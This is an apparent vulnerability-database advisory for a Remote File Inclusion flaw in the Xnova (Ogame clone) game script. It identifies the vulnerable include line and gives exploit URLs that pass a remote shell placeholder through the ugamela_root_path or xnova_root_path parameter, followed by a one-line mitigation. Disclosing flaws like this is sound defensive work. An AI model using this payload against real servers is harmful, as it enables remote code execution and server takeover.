vendor:
Ogame
by:
NuclearHaxor
7.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Ogame
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
Xnova(Ogame) Remote File Inclusion
Xnova is vulnerable to Remote File Inclusion due to the lack of proper sanitization of user input. The vulnerable file is includes/todofleetcontrol.php and the vulnerable line is include($ugamela_root_path . 'includes/functions/FlyingFleetHandler.'.$phpEx);. The exploit is target.com/includes/todofleetcontrol.php?ugamela_root_path=[shell]? or target.com/includes/todofleetcontrol.php?xnova_root_path=[shell]?.
Mitigation:
Sanitize user input and validate the input data.